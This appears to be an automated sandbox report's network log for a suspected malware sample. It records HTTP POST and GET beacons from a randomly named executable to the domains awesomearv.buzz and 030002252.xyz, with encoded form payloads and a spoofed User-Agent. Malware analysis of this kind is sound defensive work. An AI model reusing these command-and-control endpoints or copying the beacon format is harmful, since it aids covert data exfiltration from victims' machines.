                                                                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                    Oct 24, 2024 05:07:38.176409960 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449967161.97.168.245805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:39.856246948 CEST10906OUTPOST /53bw/ HTTP/1.1
                                                                                                                    Host: www.awesomearv.buzz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.awesomearv.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.awesomearv.buzz/53bw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 49 77 7a 70 49 47 4b 73 49 51 34 68 30 36 31 63 6e 35 74 4c 6c 36 46 2f 44 75 55 4e 63 77 61 4a 42 41 74 79 43 42 72 66 47 59 57 30 45 72 66 49 71 37 35 59 30 78 30 4a 50 71 77 75 36 64 2b 65 71 47 47 4d 75 63 6a 56 65 34 41 7a 75 45 45 31 56 50 74 61 6e 58 6d 48 4f 46 75 37 35 30 72 6a 6b 55 62 41 62 6c 5a 70 35 64 34 42 62 4d 68 2f 57 6d 31 63 4d 33 44 67 5a 63 4a 2f 32 6e 35 67 32 52 4d 76 43 57 56 7a 5a 65 37 6f 61 69 4c 6c 55 67 2f 72 6e 4b 56 45 2b 68 2f 35 52 74 49 4e 4b 6d 47 4f 79 52 2f 75 57 6d 30 6c 4b 72 7a 62 57 33 6d 34 33 32 33 31 5a 73 33 36 69 78 45 30 49 55 4f 45 42 46 55 79 61 61 5a 4c 4d 78 39 44 34 77 36 34 62 31 4f 4a 76 50 50 77 47 7a 31 62 65 4f 57 61 53 6e 54 78 5a 58 54 46 47 54 61 6d 41 64 79 79 4b 33 6e 6b 57 63 2b 58 6d 6d 56 74 69 79 4f 2b 59 43 74 79 33 67 38 38 63 46 50 66 50 45 44 6e 75 78 53 78 32 4b 55 6c 72 73 77 77 65 78 39 34 2b 68 4e 47 53 61 53 71 59 43 53 57 37 6c 48 55 43 52 32 62 78 70 56 36 6c 7a 4e 55 53 38 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwaJBAtyCBrfGYW0ErfIq75Y0x0JPqwu6d+eqGGMucjVe4AzuEE1VPtanXmHOFu750rjkUbAblZp5d4BbMh/Wm1cM3DgZcJ/2n5g2RMvCWVzZe7oaiLlUg/rnKVE+h/5RtINKmGOyR/uWm0lKrzbW3m43231Zs36ixE0IUOEBFUyaaZLMx9D4w64b1OJvPPwGz1beOWaSnTxZXTFGTamAdyyK3nkWc+XmmVtiyO+YCty3g88cFPfPEDnuxSx2KUlrswwex94+hNGSaSqYCSW7lHUCR2bxpV6lzNUS8jL+XDHLpaoKZBwGrdHnA17JRx0sXCOv4/li7blOJJyxJt/SlUvJFlj/lq8TSnfniQZAxOKTCra6xl8TNKzuX02mK0FuXcjMSIOUYiFTwlOeKSxy1NXH1jLsg7pjJ2Jl3JqEP/D+NKW4mqfjQkc/JOiVmyJdjG1gUAcTHMgFLEoGhdYLp4lL9KF2vFMJltA8ufChjqzxuLk61jaJ7MHlf9Bdwkf35QLRDvO5DDaYOpogXjJNweAKHqcINCV/dwr1ICkFn3UWYOV++c2HKW3lmGJrnO0Ib0/s70pEL4DY5vA83fnigmqIthZjo72dU8JeJqkL30oqnmZrgfOOHOZO07KCm4JY31rmgnYOVKotvmQfH3NThHWAlZsF+HHNGbzc80TURJ5V644TEeosRRFg8FNSSTyw3Nt+ghyLmQkdpYzXictzYN7AAmPyW4z4lMDpiCCL60kHWg66At6DEqpaytC5UV49YUo2iVNFJkav73pH1ujYzg1bN8PH5IlHDzr5u8HeJMVfTU2ug6QSGBJ4VEpn4TcKmOCMPBrDw18mWXYAZ0mzFKUNgFzlRpAz6ixjDGxOxr9q5ke6Y0KNQUTMz+/EL3qSEFSt+ny17MidpdN2w1JaUPr0BJwgs7GnZTrOm0fdkl4FMdbgxHKGOKfVzBVXaMNvn2Hiupk [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:07:40.712903976 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:40 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66cd104a-b96"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                    Oct 24, 2024 05:07:40.712956905 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449983161.97.168.245805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:42.399188042 CEST534OUTGET /53bw/?Znyl=2rnxDB&Qzj=y602DfOxy8k4aDGeL32BfjMr8rtJj4VEvf5zKPNxBw/5ZQtnSgrsDIShG/LT94BV3SRTeLh29bGmgRGfpvfkbNV5yHp9DO9ljl/7OAHX9kTVnWn3IiM7pPI= HTTP/1.1
                                                                                                                    Host: www.awesomearv.buzz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:07:43.225492954 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 24 Oct 2024 03:07:43 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 2966
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: "66cd104a-b96"
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:07:43.225532055 CEST212INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
                                                                                                                    Oct 24, 2024 05:07:43.225567102 CEST1236INData Raw: 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e
                                                                                                                    Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
                                                                                                                    Oct 24, 2024 05:07:43.225600004 CEST486INData Raw: 2d 34 36 63 30 2d 32 35 2e 33 36 35 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63
                                                                                                                    Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oop


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.45001165.21.196.90805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:48.550262928 CEST798OUTPOST /2ncs/ HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.030002252.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.030002252.xyz/2ncs/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 74 38 53 45 52 52 35 6f 65 32 71 34 74 45 4f 34 34 33 76 76 55 33 69 6c 67 39 50 63 55 42 75 30 2b 45 59 6c 62 75 68 76 36 72 6c 4e 6b 66 4d 49 76 4a 49 51 49 51 39 56 54 49 49 31 39 50 4a 6a 66 54 4b 4a 4c 61 59 2f 69 51 67 4f 45 6c 44 34 47 76 44 5a 4e 33 72 49 6c 6e 47 67 4e 73 37 39 57 7a 46 72 4c 33 70 48 73 35 47 50 57 2b 6c 63 68 37 35 79 69 55 30 48 64 50 41 34 4d 45 53 58 43 36 6a 69 43 71 42 39 30 30 59 6e 72 6c 6f 56 6e 78 50 65 4f 55 72 57 6c 33 36 4d 79 63 65 33 56 53 6b 72 46 4d 48 2f 5a 73 45 55 2b 66 36 52 52 63 4c 41 4e 77 3d 3d
                                                                                                                    Data Ascii: Qzj=P/ZYkjLBUYEvt8SERR5oe2q4tEO443vvU3ilg9PcUBu0+EYlbuhv6rlNkfMIvJIQIQ9VTII19PJjfTKJLaY/iQgOElD4GvDZN3rIlnGgNs79WzFrL3pHs5GPW+lch75yiU0HdPA4MESXC6jiCqB900YnrloVnxPeOUrWl36Myce3VSkrFMH/ZsEU+f6RRcLANw==
                                                                                                                    Oct 24, 2024 05:07:49.376538038 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 24 Oct 2024 03:07:49 GMT
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.45001265.21.196.90805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:51.169250011 CEST818OUTPOST /2ncs/ HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.030002252.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.030002252.xyz/2ncs/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 43 30 39 67 63 6c 56 50 68 76 33 4c 6c 4e 72 2f 4d 4a 67 70 49 58 49 51 42 64 54 4b 63 31 39 50 4e 6a 66 57 75 4a 4c 4a 41 67 67 41 67 49 4d 46 44 36 62 2f 44 5a 4e 33 72 49 6c 6a 57 61 4e 73 54 39 58 43 31 72 4b 56 4e 47 6b 5a 47 49 52 2b 6c 63 6c 37 35 32 69 55 31 51 64 4f 63 53 4d 47 71 58 43 34 72 69 43 34 70 2b 2b 30 59 68 30 56 70 36 6a 51 71 77 45 6b 4c 63 75 32 36 52 36 2b 6e 53 55 55 31 78 55 39 6d 6f 4c 73 67 6e 6a 59 7a 6c 63 66 32 4a 57 37 4b 30 44 41 73 32 6d 39 4f 63 39 6d 45 74 6e 42 75 71 4e 62 49 3d
                                                                                                                    Data Ascii: Qzj=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1C09gclVPhv3LlNr/MJgpIXIQBdTKc19PNjfWuJLJAggAgIMFD6b/DZN3rIljWaNsT9XC1rKVNGkZGIR+lcl752iU1QdOcSMGqXC4riC4p++0Yh0Vp6jQqwEkLcu26R6+nSUU1xU9moLsgnjYzlcf2JW7K0DAs2m9Oc9mEtnBuqNbI=
                                                                                                                    Oct 24, 2024 05:07:51.965693951 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 24 Oct 2024 03:07:51 GMT
                                                                                                                    vary: User-Agent
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.45001365.21.196.90805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:07:53.725924015 CEST10900OUTPOST /2ncs/ HTTP/1.1
                                                                                                                    Host: www.030002252.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.030002252.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.030002252.xyz/2ncs/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
